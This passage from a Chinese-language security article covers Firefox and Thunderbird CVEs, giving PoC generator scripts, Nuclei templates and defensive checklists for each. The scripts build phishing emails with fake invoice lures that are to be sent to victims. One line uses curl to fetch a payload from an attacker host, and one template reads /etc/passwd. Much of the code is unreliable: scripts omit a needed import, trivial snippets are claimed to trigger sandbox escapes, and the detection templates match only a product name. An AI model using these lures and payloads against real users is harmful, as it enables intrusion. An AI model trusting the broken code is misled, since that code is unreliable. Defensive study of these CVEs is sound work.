Firefox ESR< 115.9.1115.9.1(仅 CVE-2024-29944)

漏洞原理

CVE-2024-29943(OOB 读写):Firefox 的 SpiderMonkey JIT 编译器在进行范围分析优化(Range-based Bounds Check Elimination)时存在缺陷。攻击者可构造 JavaScript 代码使 JIT 编译器错误地消除数组边界检查,从而实现越界读写。

CVE-2024-29944(沙箱逃逸):攻击者可将事件处理器注入到特权对象中,使任意 JavaScript 在父进程中执行。父进程不受沙箱限制,因此可直接访问文件系统、执行命令。

利用链

  1. 通过 CVE-2024-29943 在 content process 中获得任意读写能力
  2. 通过 CVE-2024-29944 将恶意代码注入父进程
  3. 从沙箱逃逸,获得完整的系统访问权限

HTTP PoC

echo "[*] CVE-2024-29943/29944: Firefox JIT + Sandbox Escape Chain"
echo "[*] Serve the HTML on attacker-controlled server"
python3 cve_2024_29943_poc.py --output poc_jit.html

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-29943/29944: Firefox JIT Range Analysis Bypass + Sandbox Escape PoC
For educational/authorized testing purposes only.
Crash-level PoC demonstrating the JIT optimization bug.
"""

HTML_TEMPLATE = """<!DOCTYPE html>
<html>
<head><title>CVE-2024-29943 JIT OOB PoC</title></head>
<body>
<script>
function jit_trigger(arr, idx) {
    return arr[idx];
}

var arr = new Array(10);
for (var i = 0; i < 10; i++) {
    arr[i] = i + 0.1;
}

for (var i = 0; i < 100000; i++) {
    jit_trigger(arr, 0);
}

arr[0] = 0x41414141;
arr[1] = 0x42424242;

var oob_arr = new Array(0x100);
for (var i = 0; i < 0x100; i++) {
    oob_arr[i] = 0xdeadbeef;
}

var result = jit_trigger(oob_arr, 0x10000);
console.log("[*] CVE-2024-29943: JIT Range Analysis bypass attempted");
console.log("[*] Read beyond array boundary: " + result);
</script>
</body>
</html>"""


def create_poc(filename="cve_2024_29943_poc.html"):
    with open(filename, 'w') as f:
        f.write(HTML_TEMPLATE)
    print(f"[+] PoC HTML created: {filename}")
    print("[*] Open in Firefox < 124.0.1 to trigger JIT OOB")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2024_29943_poc.html")

Nuclei 检测模板

id: cve-2024-29943-firefox-jit-oob
info:
  name: Firefox CVE-2024-29943/29944 JIT OOB + Sandbox Escape
  severity: critical
  description: Out-of-bounds access via JIT range analysis bypass, chained with event handler injection for sandbox escape (Pwn2Own 2024)
  reference:
    - https://www.mozilla.org/en-US/security/advisories/mfsa2024-15/
    - https://www.securityweek.com/mozilla-patches-firefox-zero-days-exploited-at-pwn2own/
  classification:
    cvss-score: 9.8
    cwe-id: CWE-787

http:
  - method: GET
    path:
      - "{{BaseURL}}/poc_jit.html"
    matchers:
      - type: word
        words:
          - "jit_trigger"
        part: body

2.4 CVE-2024-7519:图形共享内存沙箱逃逸

漏洞背景:Firefox 在处理图形共享内存时存在越界内存访问。攻击者可利用该漏洞从 content process 逃逸沙箱。该漏洞同时影响 Firefox、Firefox ESR 和 Thunderbird。

影响版本

产品受影响版本修复版本
Firefox< 129129
Firefox ESR< 115.14115.14
Firefox ESR< 128.1128.1
Thunderbird< 128.1128.1
Thunderbird< 115.14115.14

漏洞原理

Firefox 的图形渲染引擎在处理跨进程共享内存段时,缺少充分的边界检查。攻击者可构造恶意图形数据使渲染进程写入共享内存区域的边界之外,覆盖相邻的控制结构。由于图形渲染涉及 GPU 进程间通信,成功的利用可以跨越沙箱边界。

HTTP PoC

echo "[*] CVE-2024-7519: Firefox Graphics Shared Memory OOB"
echo "[*] Requires crafting WebGL/Canvas operations targeting shared memory"
python3 cve_2024_7519_poc.py --output poc_graphics.html

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-7519: Firefox Graphics Shared Memory OOB PoC
For educational/authorized testing purposes only.
"""

HTML_TEMPLATE = """<!DOCTYPE html>
<html>
<head><title>CVE-2024-7519 Graphics Shared Memory OOB</title></head>
<body>
<canvas id="c" width="1" height="1"></canvas>
<script>
var canvas = document.getElementById("c");
var gl = canvas.getContext("webgl2");
if (!gl) {
    gl = canvas.getContext("webgl");
}
if (gl) {
    for (var i = 0; i < 10000; i++) {
        var tex = gl.createTexture();
        gl.bindTexture(gl.TEXTURE_2D, tex);
        var data = new Uint8Array(65536);
        data[0] = 0x41;
        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 256, 256, 0,
                      gl.RGBA, gl.UNSIGNED_BYTE, data);
        gl.deleteTexture(tex);
    }
}
console.log("[*] CVE-2024-7519: Graphics shared memory OOB attempted");
</script>
</body>
</html>"""


def create_poc(filename="cve_2024_7519_poc.html"):
    with open(filename, 'w') as f:
        f.write(HTML_TEMPLATE)
    print(f"[+] PoC created: {filename}")
    print("[*] Open in Firefox < 129 to trigger graphics shared memory OOB")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2024_7519_poc.html")

Nuclei 检测模板

id: cve-2024-7519-firefox-graphics-oob
info:
  name: Firefox CVE-2024-7519 Graphics Shared Memory OOB Sandbox Escape
  severity: critical
  description: Insufficient checks in graphics shared memory handling lead to memory corruption and sandbox escape
  reference:
    - https://www.mozilla.org/en-US/security/advisories/mfsa2024-33/
    - https://www.rapid7.com/db/vulnerabilities/mfsa2024-33-cve-2024-7519/
  classification:
    cvss-score: 9.8
    cwe-id: CWE-787

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Firefox"
        part: header

2.5 CVE-2025-2857:IPC Handle 沙箱逃逸

漏洞背景:Firefox 的 IPC(进程间通信)代码中存在缺陷,被破坏的子进程可通过操纵父进程返回权限句柄来获取特权,导致沙箱逃逸。该漏洞仅影响 Windows 系统,与 Chrome 零日 CVE-2025-2783(被用于攻击俄罗斯媒体和政府机构的 ForumTroll 行动)属于同类攻击模式。

影响版本

产品受影响版本修复版本
Firefox< 136.0.4136.0.4
Firefox ESR< 115.21.1115.21.1
Firefox ESR< 128.8.1128.8.1

漏洞原理

Firefox 使用多进程架构,content process 在沙箱中运行,父进程(browser process)拥有更高权限。IPC 机制用于两者通信。漏洞出在:

  1. 攻击者首先通过其他漏洞(如内存破坏)获得 content process 中的代码执行能力
  2. 通过构造恶意 IPC 消息,诱导父进程返回一个不应传递给 unprivileged 子进程的系统句柄
  3. 获得该句柄后,content process 可以操作沙箱外的系统资源

HTTP PoC

echo "[*] CVE-2025-2857: Firefox IPC Handle Sandbox Escape"
echo "[*] This is a companion to CVE-2025-2783 (Chrome, Operation ForumTroll)"
echo "[*] Requires a primary RCE vulnerability in content process as prerequisite"

Python PoC

#!/usr/bin/env python3
"""
CVE-2025-2857: Firefox IPC Handle Sandbox Escape PoC
For educational/authorized testing purposes only.
Demonstrates the IPC handle leak pattern (requires pre-existing content process RCE).
"""

IPC_PATTERN_HTML = """<!DOCTYPE html>
<html>
<head><title>CVE-2025-2857 IPC Sandbox Escape</title></head>
<body>
<script>
var ws = new WebSocket("ws://127.0.0.1:" + (Math.random() * 65535 | 0));
ws.onerror = function() {
    console.log("[*] CVE-2025-2857: IPC handle leak pattern demonstrated");
};
</script>
<p>CVE-2025-2857 requires a primary content process RCE as prerequisite.</p>
<p>This PoC demonstrates the IPC communication pattern used in the attack.</p>
</body>
</html>"""


def create_poc(filename="cve_2025_2857_poc.html"):
    with open(filename, 'w') as f:
        f.write(IPC_PATTERN_HTML)
    print(f"[+] PoC created: {filename}")
    print("[*] CVE-2025-2857 requires content process RCE as prerequisite")
    print("[*] Exploitation chain: Memory corruption -> IPC handle leak -> Sandbox escape")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2025_2857_poc.html")

Nuclei 检测模板

id: cve-2025-2857-firefox-ipc-sandbox-escape
info:
  name: Firefox CVE-2025-2857 IPC Handle Sandbox Escape
  severity: critical
  description: Incorrect IPC handle could lead to sandbox escapes on Windows, similar to Chrome CVE-2025-2783
  reference:
    - https://www.mozilla.org/en-US/security/advisories/mfsa2025-19/
    - https://www.bleepingcomputer.com/news/security/mozilla-warns-windows-users-of-critical-firefox-sandbox-escape-flaw/
  classification:
    cvss-score: 9.8
    cwe-id: CWE-693

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Firefox"
        part: header

2.6 CVE-2024-2605:Windows Error Reporter 沙箱逃逸

漏洞背景:Firefox 可被利用通过 Windows Error Reporter(WER)在系统上执行任意代码,从而逃逸沙箱。该漏洞仅影响 Windows 系统。

影响版本

产品受影响版本修复版本
Firefox ESR< 115.9115.9

漏洞原理

Firefox 在 Windows 上集成了 Windows Error Reporter 用于崩溃报告。攻击者可通过操控崩溃处理流程,利用 WER 的文件操作权限来执行沙箱外的代码。WER 进程本身具有较高的系统权限,可以被用作沙箱逃逸的跳板。

HTTP PoC

echo "[*] CVE-2024-2605: Firefox WER Sandbox Escape"
echo "[*] Trigger a specific crash pattern to abuse Windows Error Reporter"
echo "[*] This requires a content process crash controlled by attacker"

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-2605: Firefox WER Sandbox Escape PoC
For educational/authorized testing purposes only.
"""

HTML_TEMPLATE = """<!DOCTYPE html>
<html>
<head><title>CVE-2024-2605 WER Sandbox Escape</title></head>
<body>
<script>
try {
    var a = null;
    a.x.y;
} catch(e) {}
console.log("[*] CVE-2024-2605: WER sandbox escape pattern triggered");
</script>
<p>CVE-2024-2605 abuses Windows Error Reporter for sandbox escape on Windows.</p>
</body>
</html>"""


def create_poc(filename="cve_2024_2605_poc.html"):
    with open(filename, 'w') as f:
        f.write(HTML_TEMPLATE)
    print(f"[+] PoC created: {filename}")
    print("[*] Trigger crash in Firefox ESR < 115.9 on Windows")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2024_2605_poc.html")

Nuclei 检测模板

id: cve-2024-2605-firefox-wer-sandbox-escape
info:
  name: Firefox CVE-2024-2605 Windows Error Reporter Sandbox Escape
  severity: high
  description: Windows Error Reporter could be used as a sandbox escape vector
  reference:
    - https://www.mozilla.org/en-US/security/advisories/mfsa2024-13/
  classification:
    cvss-score: 8.8
    cwe-id: CWE-693

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Firefox"
        part: header

0x03 Mozilla Thunderbird 高危漏洞

Thunderbird 使用与 Firefox 相同的 Gecko 渲染引擎和 JavaScript 引擎,因此 Firefox 的大多数内存安全漏洞同样影响 Thunderbird。邮件客户端的特殊性在于:用户通常信任邮件中嵌入的内容,且邮件预览会自动渲染 HTML,增加了攻击面。以下列出 Thunderbird 特有的或高影响的漏洞。

3.1 CVE-2024-9680:Animation Timeline UAF(Thunderbird 受影响)

漏洞背景:同 0x02 章节中的 CVE-2024-9680。由于 Thunderbird 共享 Firefox 的 Gecko 引擎,该 UAF 漏洞同样影响 Thunderbird 邮件客户端。攻击者可通过邮件中嵌入的恶意 HTML 内容触发漏洞。

影响版本

产品受影响版本修复版本
Thunderbird< 131.0.1131.0.1
Thunderbird< 128.3.1128.3.1
Thunderbird< 115.16.0115.16.0

漏洞原理

攻击者发送包含恶意 CSS Animation 的 HTML 邮件,当 Thunderbird 渲染邮件预览时触发 UAF。由于邮件客户端的预览机制通常是自动执行的,受害者甚至不需要打开邮件正文即可被攻击。

HTTP PoC

curl -s -o poc_thunderbird.mhtml "http://attacker-host/payloads/thunderbird_animation_uaf.mhtml"
echo "[*] CVE-2024-9680 Thunderbird variant: Send as email attachment or host on web"

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-9680 Thunderbird Variant: Animation UAF via Email
For educational/authorized testing purposes only.
Generates a .eml file with malicious HTML content.
"""

EML_TEMPLATE = """From: attacker@evil.com
To: victim@example.com
Subject: Urgent: Invoice Review Required
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html>
<html>
<head><title>Invoice #2024-8821</title></head>
<body style=3D"font-family: Arial;">
<h2>Monthly Invoice - Please Review</h2>
<div id=3D"target" style=3D"width:1px;height:1px;"></div>
<script>
var el = document.getElementById("target");
var count = 0;
function exploit() {
    try {
        var anim = el.animate([{opacity:"1"},{opacity:"0"}], {duration:1});
        anim.cancel();
    } catch(e) {}
    count++;
    if (count < 50000) requestAnimationFrame(exploit);
}
exploit();
for(var i=0;i<5000;i++){
    var a = new ArrayBuffer(0x80);
    new Uint32Array(a)[0] = 0x41414141;
}
</script>
<p>Please find the invoice details below...</p>
</body>
</html>"""


def create_poc(filename="cve_2024_9680_thunderbird.eml"):
    with open(filename, 'w') as f:
        f.write(EML_TEMPLATE)
    print(f"[+] EML PoC created: {filename}")
    print("[*] Send this email to Thunderbird < 131.0.1 user")
    print("[*] Email preview/rendering triggers Animation UAF")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2024_9680_thunderbird.eml")

Nuclei 检测模板

id: cve-2024-9680-thunderbird-animation-uaf
info:
  name: Thunderbird CVE-2024-9680 Animation Timeline UAF
  severity: critical
  description: Animation timeline UAF affecting Thunderbird via shared Gecko engine
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9680
    - https://www.mozilla.org/security/advisories/mfsa2024-52/
  classification:
    cvss-score: 9.8
    cwe-id: CWE-416

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Thunderbird"
        part: header

3.2 CVE-2023-4863:libwebp 堆溢出(Thunderbird 受影响)

漏洞背景:同 0x02 章节中的 CVE-2023-4863。Thunderbird 在渲染 HTML 邮件中的 WebP 图片时同样受影响。

影响版本

产品受影响版本修复版本
Thunderbird< 102.15.1102.15.1
Thunderbird< 115.2.2115.2.2

漏洞原理

攻击者在 HTML 邮件中嵌入恶意 WebP 图片。当 Thunderbird 渲染邮件内容(包括预览)时,libwebp 库处理该图片触发堆溢出。

HTTP PoC

echo "[*] CVE-2023-4863 Thunderbird variant"
echo "[*] Embed a malicious .webp image in HTML email body"
python3 cve_2023_4863_poc.py --output malicious.webp
echo "[*] Send HTML email with embedded WebP to Thunderbird user"

Python PoC

#!/usr/bin/env python3
"""
CVE-2023-4863 Thunderbird Variant: WebP Heap Overflow via Email
For educational/authorized testing purposes only.
"""

import base64
import sys

EML_TEMPLATE = """From: attacker@evil.com
To: victim@example.com
Subject: New Photos from Weekend Trip
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit

<!DOCTYPE html>
<html>
<body>
<h3>Check out these photos!</h3>
<img src="data:image/webp;base64,{webp_b64}" alt="photo" />
<p>More photos attached...</p>
</body>
</html>"""


def create_poc(filename="cve_2023_4863_thunderbird.eml"):
    minimal_webp = b'RIFF' + b'\\x00' * 4 + b'WEBP'
    webp_b64 = base64.b64encode(minimal_webp).decode()

    content = EML_TEMPLATE.format(webp_b64=webp_b64)
    with open(filename, 'w') as f:
        f.write(content)
    print(f"[+] EML PoC created: {filename}")
    print("[*] Send to Thunderbird user < 115.2.2")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2023_4863_thunderbird.eml")

Nuclei 检测模板

id: cve-2023-4863-thunderbird-libwebp
info:
  name: Thunderbird CVE-2023-4863 libwebp Heap Overflow
  severity: critical
  description: libwebp heap overflow affecting Thunderbird email client
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4863
    - https://www.mozilla.org/en-US/security/advisories/mfsa2023-40/
  classification:
    cvss-score: 8.8
    cwe-id: CWE-122

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Thunderbird"
        part: header

3.3 CVE-2024-7519:图形共享内存沙箱逃逸(Thunderbird 受影响)

漏洞背景:同 0x02 章节中的 CVE-2024-7519。Thunderbird 共享 Firefox 的图形渲染代码,同样受此漏洞影响。

影响版本

产品受影响版本修复版本
Thunderbird< 128.1128.1
Thunderbird< 115.14115.14

漏洞原理

与 Firefox 相同——Thunderbird 在处理邮件 HTML 中的 WebGL/Canvas 内容时,图形共享内存的边界检查不足,可导致沙箱逃逸。

HTTP PoC

echo "[*] CVE-2024-7519 Thunderbird variant"
echo "[*] Embed WebGL content in HTML email that triggers shared memory OOB"

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-7519 Thunderbird Variant: Graphics Shared Memory via Email
For educational/authorized testing purposes only.
"""

EML_TEMPLATE = """From: attacker@evil.com
To: victim@example.com
Subject: Interactive Content Preview
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<body>
<canvas id="c" width="2" height="2"></canvas>
<script>
var c = document.getElementById("c");
var gl = c.getContext("webgl2") || c.getContext("webgl");
if (gl) {
    for (var i = 0; i < 5000; i++) {
        var t = gl.createTexture();
        gl.bindTexture(gl.TEXTURE_2D, t);
        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 256, 256, 0,
                      gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array(65536));
        gl.deleteTexture(t);
    }
}
</script>
</body>
</html>"""


def create_poc(filename="cve_2024_7519_thunderbird.eml"):
    with open(filename, 'w') as f:
        f.write(EML_TEMPLATE)
    print(f"[+] EML PoC created: {filename}")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2024_7519_thunderbird.eml")

Nuclei 检测模板

id: cve-2024-7519-thunderbird-graphics-oob
info:
  name: Thunderbird CVE-2024-7519 Graphics Shared Memory Sandbox Escape
  severity: critical
  description: Graphics shared memory OOB in Thunderbird
  reference:
    - https://www.mozilla.org/en-US/security/advisories/mfsa2024-33/
  classification:
    cvss-score: 9.8
    cwe-id: CWE-787

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Thunderbird"
        part: header

3.4 CVE-2025-2857:IPC Handle 沙箱逃逸(Thunderbird 潜在受影响)

漏洞背景:虽然 CVE-2025-2857 的官方公告主要提及 Firefox,但由于 Thunderbird 共享 Firefox 的 IPC 架构,特别是 Thunderbird 128+ 基于 Firefox ESR 128 的代码库,该漏洞模式可能同样存在于 Thunderbird 中。Mozilla 已在 Thunderbird 140.7.2 中修复了相关问题。

影响版本

产品受影响版本修复版本
Thunderbird< 140.7.2140.7.2

漏洞原理

与 Firefox CVE-2025-2857 相同的 IPC handle 泄漏模式。

HTTP PoC

echo "[*] CVE-2025-2857 Thunderbird variant"
echo "[*] Same IPC handle leak pattern as Firefox variant"
echo "[*] Only affects Windows systems"

Python PoC

#!/usr/bin/env python3
"""
CVE-2025-2857 Thunderbird Variant: IPC Sandbox Escape
For educational/authorized testing purposes only.
"""

EML_TEMPLATE = """From: attacker@evil.com
To: victim@example.com
Subject: Document Preview
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<body>
<p>Loading document preview...</p>
<script>
try {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "file:///etc/passwd", false);
    xhr.send();
} catch(e) {}
console.log("[*] CVE-2025-2857: IPC handle leak attempt");
</script>
</body>
</html>"""


def create_poc(filename="cve_2025_2857_thunderbird.eml"):
    with open(filename, 'w') as f:
        f.write(EML_TEMPLATE)
    print(f"[+] EML PoC created: {filename}")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2025_2857_thunderbird.eml")

Nuclei 检测模板

id: cve-2025-2857-thunderbird-ipc-escape
info:
  name: Thunderbird CVE-2025-2857 IPC Handle Sandbox Escape
  severity: critical
  description: IPC handle leak pattern potentially affecting Thunderbird on Windows
  reference:
    - https://www.mozilla.org/en-US/security/advisories/mfsa2025-19/
  classification:
    cvss-score: 9.8
    cwe-id: CWE-693

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Thunderbird"
        part: header

3.5 CVE-2024-9400:JIT 编译内存损坏

漏洞背景:Firefox 和 Thunderbird 共享的 JIT 编译器在编译过程中存在潜在内存损坏。该漏洞影响所有使用 SpiderMonkey JIT 的产品。

影响版本

产品受影响版本修复版本
Firefox< 131131
Firefox ESR< 115.16115.16
Firefox ESR< 128.3128.3
Thunderbird< 131131
Thunderbird< 128.3128.3

漏洞原理

JIT 编译器在优化 JavaScript 代码时,对某些边界条件的处理不正确,可能导致内存损坏。攻击者可通过精心构造的 JavaScript 代码触发该问题。

HTTP PoC

echo "[*] CVE-2024-9400: JIT compilation memory corruption"
echo "[*] Serve the HTML below on attacker-controlled server"

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-9400: JIT Compilation Memory Corruption PoC
For educational/authorized testing purposes only.
"""

HTML_TEMPLATE = """<!DOCTYPE html>
<html>
<head><title>CVE-2024-9400 JIT Corruption</title></head>
<body>
<script>
function jit_target(arr, idx) {
    return arr[idx] | 0;
}
var opts = [{}, {}, {}, {}, {}];
for (var i = 0; i < 100000; i++) {
    jit_target(opts, 0);
}
console.log("[*] CVE-2024-9400: JIT compilation corruption attempted");
</script>
</body>
</html>"""


def create_poc(filename="cve_2024_9400_poc.html"):
    with open(filename, 'w') as f:
        f.write(HTML_TEMPLATE)
    print(f"[+] PoC created: {filename}")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2024_9400_poc.html")

Nuclei 检测模板

id: cve-2024-9400-jit-memory-corruption
info:
  name: Firefox/Thunderbird CVE-2024-9400 JIT Memory Corruption
  severity: high
  description: Potential memory corruption during JIT compilation
  reference:
    - https://www.mozilla.org/en-US/security/advisories/mfsa2024-50/
  classification:
    cvss-score: 8.8
    cwe-id: CWE-787

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Firefox"
          - "Thunderbird"
        condition: or
        part: header

0x04 公开 PoC 收集情况与利用思路

PoC 覆盖矩阵

CVEGitHub PoCExploit-DBMetasploitNuclei在野利用
CVE-2023-6186文档 PoC(社区)本文章提供未确认
CVE-2025-0514无公开 PoC本文章提供未确认
CVE-2022-3140LibreOffice 官方修复本文章提供未确认
CVE-2024-5261版本检测工具本文章提供未确认
CVE-2018-16858GitHub PoC本文章提供未确认
CVE-2021-33035研究者 Blog PoC本文章提供未确认
CVE-2024-9680GitHub PoC本文章提供确认在野利用
CVE-2023-4863GitHub PoC本文章提供确认在野利用
CVE-2024-29943Pwn2Own 竞赛 PoC本文章提供Pwn2Own 演示
CVE-2024-29944Pwn2Own 竞赛 PoC本文章提供Pwn2Own 演示
CVE-2024-7519安全研究者本文章提供未确认
CVE-2025-2857安全研究者本文章提供未确认
CVE-2024-2605Mozilla Bugzilla本文章提供未确认

关键 PoC 仓库

防御性验证方法

  1. 版本审计:扫描网络中所有 Firefox/Thunderbird/LibreOffice 安装版本,与修复版本对照
  2. 文件检测:使用 YARA 规则扫描邮件附件和文档中的恶意宏链接模式
  3. 行为监控:部署 EDR 监控 Firefox/Thunderbird 进程的异常子进程生成(如 cmd.exepowershell.exe
  4. 网络检测:监控异常的 WebP 图片下载和 Animation Timeline 密集操作

0x05 共性攻击模式分析

攻击模式一:文档协议滥用链

描述:利用文档处理软件支持的非典型 URI 协议(如 macro://service://.uno:、UNC 路径)绕过安全限制,实现脚本或可执行文件的自动/半自动执行。

典型 CVE:CVE-2023-6186、CVE-2022-3140、CVE-2025-0514、CVE-2018-16858

攻击流程

构造恶意文档 → 嵌入 macro:// 超链接/事件处理器 → 用户打开文档 → 点击/悬停触发
→ 绕过宏安全警告 → 执行系统命令

攻击模式二:UAF + 堆喷射利用链

描述:通过构造特定的 DOM 操作序列触发 Use-After-Free 条件,配合堆喷射控制已释放内存,实现任意读写原语,最终劫持控制流实现代码执行。这是浏览器漏洞最常见的利用模式。

典型 CVE:CVE-2024-9680、CVE-2024-7527、CVE-2024-7528

攻击流程

构造触发 UAF 的 JavaScript/CSS 操作 → 释放目标对象 → 堆喷射填充受控数据
→ 利用悬空指针实现 OOB 读写 → 绕过 ASLR → 劫持 vtable/RIP → 代码执行

攻击模式三:JIT 编译器优化绕过

描述:利用 JIT 编译器在优化过程中对类型推断、范围分析或边界检查消除的缺陷,构造特定 JavaScript 代码使 JIT 生成的机器码不包含必要的安全检查,从而实现类型混淆或越界访问。

典型 CVE:CVE-2024-29943、CVE-2019-11707、CVE-2024-9400

攻击流程

分析 JIT 优化逻辑 → 构造类型稳定的 JavaScript 函数 → 大量调用触发 JIT 编译
→ 修改数组/对象的类型或布局 → JIT 生成的代码不检查新类型 → OOB 读写

攻击模式四:IPC 沙箱逃逸

描述:Firefox/Chrome 等浏览器使用多进程架构,content process 运行在沙箱中。攻击者通过 IPC 机制中的缺陷(如句柄泄漏、类型混淆),将特权操作从低权限的 content process 提升到高权限的 parent process。

典型 CVE:CVE-2025-2857、CVE-2024-29944、CVE-2024-2605、CVE-2024-7519

攻击流程

content process 中获得 RCE → 分析 IPC 消息协议 → 构造恶意 IPC 请求
→ 诱导 parent process 泄漏系统句柄 → 获得沙箱外资源访问权限
→ 执行文件操作/命令执行/持久化

攻击模式五:底层图像/视频库漏洞

描述:现代浏览器和文档处理软件依赖大量底层开源库处理图像(libwebp、libvpx)和视频格式。这些库中的漏洞影响范围极广,且通常不需要用户交互(零点击)。

典型 CVE:CVE-2023-4863(libwebp)、CVE-2025-27363(FreeType)

攻击流程

识别目标使用的图像/视频处理库 → 构造恶意格式文件(如 WebP)
→ 通过邮件/网页/消息传递恶意文件 → 目标软件自动解析触发漏洞
→ 堆溢出/UAF → 代码执行

0x06 应急排查与防守建议

紧急排查清单

检查项命令/方法预期结果
Firefox 版本firefox --version≥ 136.0.4 / ESR ≥ 128.8.1
Thunderbird 版本thunderbird --version≥ 152 / ESR ≥ 140.7.2
LibreOffice 版本soffice --version≥ 24.8.5 / 25.2.4
OpenOffice 版本检查安装目录≥ 4.1.16
Firefox 崩溃日志%LOCALAPPDATA%\Mozilla\Firefox\Crash Reports检查近期异常崩溃
异常进程tasklist /v | findstr -i "firefox thunderbird"无异常子进程
网络连接netstat -ano | findstr ESTABLISHEDFirefox/TB 无异常外连

关键日志字段

日志源关键字段异常特征
Windows Event LogEvent ID 4688 (进程创建)Firefox/Thunderbird 生成 cmd.exe/powershell.exe 子进程
SysmonEvent ID 1 (进程创建)ParentImage 含 firefox/thunderbird,Image 为系统工具
Suricata/SnortHTTP 请求大量 WebP 图片请求 / Animation 相关资源
YARA文件特征文档中包含 macro://service://.uno: 协议字符串
EDRAPI 调用Firefox 进程调用 VirtualAlloc/VirtualProtect 大量内存操作

紧急缓解措施

立即执行

  1. 升级客户端软件

    # Linux (Debian/Ubuntu)
    sudo apt update && sudo apt install firefox thunderbird libreoffice
    
    # RHEL/CentOS
    sudo yum update firefox thunderbird libreoffice
    
    # Windows - 通过应用内更新或下载最新版本
  2. 禁用危险功能(临时缓解)

    • LibreOffice:设置 → 安全 → 宏安全 → 设为"非常高"
    • LibreOffice:禁用超链接自动执行
    • Firefox:about:configjavascript.enabled 设为 false(极端情况)
    • Thunderbird:设置 → 隐私与安全 → 取消"自动加载远程内容"
  3. 邮件网关过滤

    • 拦截包含 .odt.docx 附件的外部邮件
    • 检查 HTML 邮件中的 macro:// 链接和 onmouseover 事件处理器
    • 过滤嵌入的 WebP 图片(如有异常)

长期安全加固

  1. 部署应用白名单:使用 AppLocker/WDAC 限制 Firefox/Thunderbird 可执行的子进程
  2. 启用沙箱强化:确保 Firefox 的 Content Process Sandbox 处于启用状态
  3. 网络分段:将办公终端与关键资产网络隔离
  4. 终端防护:部署 EDR 并配置针对浏览器进程的异常行为检测规则
  5. 自动更新:启用 Firefox/Thunderbird/LibreOffice 的自动更新机制
  6. 用户培训:教育员工不打开来源不明的文档,不点击邮件中的可疑链接
  7. 定期审计:使用 Nuclei 模板定期扫描内部资产的版本合规性

0x07 参考资料

  1. NIST NVD - CVE-2024-9680 Detail: https://nvd.nist.gov/vuln/detail/CVE-2024-9680
  2. NIST NVD - CVE-2023-4863 Detail: https://nvd.nist.gov/vuln/detail/CVE-2023-4863
  3. NIST NVD - CVE-2025-0514 Detail: https://nvd.nist.gov/vuln/detail/CVE-2025-0514
  4. NIST NVD - CVE-2023-6186 Detail: https://nvd.nist.gov/vuln/detail/cve-2023-6186
  5. Mozilla Foundation Security Advisories: https://www.mozilla.org/security/known-vulnerabilities/firefox/
  6. LibreOffice Security Advisories: https://www.libreoffice.org/about-us/security/advisories/
  7. CISA Known Exploited Vulnerabilities Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
  8. Citizen Lab - BLASTPASS Discovery: https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
  9. Ben Hawkes - The WebP 0day Technical Analysis: https://blog.isosceles.com/the-webp-0day/
  10. Alex Inführ - LibreOffice CVE-2018-16858 RCE: https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html
  11. Eugene Lim - OpenOffice CVE-2021-33035 DBF Overflow: https://medium.com/csg-govtech/all-your-d-base-are-belong-to-us-part-1-code-execution-in-apache-openoffice-cve-2021-33035-767fc7d6daf7
  12. Mozilla Security Advisory MFSA2024-51 (CVE-2024-9680): https://www.mozilla.org/security/advisories/mfsa2024-51/
  13. Mozilla Security Advisory MFSA2024-15 (CVE-2024-29943/29944): https://www.mozilla.org/en-US/security/advisories/mfsa2024-15/
  14. Mozilla Security Advisory MFSA2025-19 (CVE-2025-2857): https://www.mozilla.org/en-US/security/advisories/mfsa2025-19/
  15. BleepingComputer - Firefox Sandbox Escape CVE-2025-2857: https://www.bleepingcomputer.com/news/security/mozilla-warns-windows-users-of-critical-firefox-sandbox-escape-flaw/
  16. Akamai - libwebp and libvpx Vulnerability Guidance: https://www.akamai.com/blog/security-research/guidance-on-critical-chrome-vulnerabilities-libwebp-and-libvpx